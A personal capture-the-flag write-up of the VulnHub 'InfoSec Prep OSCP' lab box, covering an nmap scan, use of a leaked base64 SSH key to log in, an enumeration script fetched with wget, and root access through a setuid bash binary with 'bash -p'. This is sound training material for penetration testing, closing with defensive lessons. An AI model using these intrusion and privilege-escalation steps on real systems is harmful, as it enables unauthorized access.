I did this box for the OSCP voucher giveaway back in July. I had to wait until the contest was over. I was not one of the lucky winners. :‘( Good experience nonetheless.

Vulnhub InfoSec Prep OSCP submission
InfoSec Prep OSCP flag submission

Scanning and Enumeration

The first step is always an nmap scan:

sudo nmap -sV -sC

This scan was hella fast which saved me the time of enumerating directories with Gobuster.

sudo nmap -sV -T4 -p- -oN
(out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 11:07 EDT
(out)Nmap scan report for
(out)Host is up (0.23s latency).
(out)Not shown: 998 closed ports
(out)22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
(out)80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
(out)|_http-generator: WordPress 5.4.2
(out)| http-robots.txt: 1 disallowed entry
(out)|_http-server-header: Apache/2.4.41 (Ubuntu)            
(out)|_http-title: OSCP Voucher – Just another WordPress site
(out)Nmap done: 1 IP address (1 host up) scanned in 6.08 seconds

Gaining access via SSH

Since the scan came back so fast, I didn’t even have a chance to go look for a robots.txt file which would have been my first move after starting a Gobuster scan. In the nmap scan, there is a secret.txt file.

I downloaded and opened the secret.txt file, it’s a base64. At first I thought it was a certificate missing the comments at the beginning and end. I tried adding those and SSHing, but it didn’t work, so I tried decoding the base64 and it turned out to be the certifcate which I then used to SSH. I guessed the oscp user because that is the user that appeared on the VMs login screen. I did try root@ first which did not work:

cat secret.txt | base64 -d > key
chmod 600 key
ssh -i key_file oscp@

Post Exploit

Enumerating for Privilege Escalation

Once I am in the box I id and I am user named oscp without root.

(out)uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

Next I check for access to:

  • /root directory. Nope not so lucky.
  • /home directory. There is one directory for a user named oscp.

I checked out the contents of /home/oscp and found an ip file. This file was owned by root and I was thinking this would be a file run by a cron job maybe, but that didn’t pan out. If there was something there I missed it.

ls -la /home/oscp
(out)-rwxr-xr-x 1  root root    88 Jul 18 11:04  ip

Next I downloaded my favorite Linux enumeration script: Linux Smart Enumeration. Sometimes you have to start a Python server on your machine to do this, but this time I was able to get it directly from GitHub.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

I gave the script proper permissions and ran it. The output is enormous so I’m only including what immediately stuck out to me and ended up being the answer:

chmod +x lse.sh
(out)[!] fst020 Uncommon setuid binaries........................................ yes!

Getting Root Flag

Once I see setuid binaries, I head over to GTFOBins

I didn’t have a password and could not use sudo so I tried:

sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p

I was still unprivileged oscp. :(

After re-reading the GTFOBins notes which I should have done in the first place: “To exploit an existing SUID binary skip the first command and run the program using its original path”, I tried:

/usr/bin/bash -p
(out)uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

I’m root

ls /root
(out)fix-wordpress  flag.txt  snap
cat /root/flag.txt



  • If you find a base64 try decoding it before trying anything else with it.
  • Read the details for exploits you are using, don't just start copying and pasting stuff without understanding.


  • Ensure you have not misconfigured binaries with suid.
  • Don't leave ssh keys exposed.

Invaluable Tools

Try the VulnHub Infosec Prep OSCP box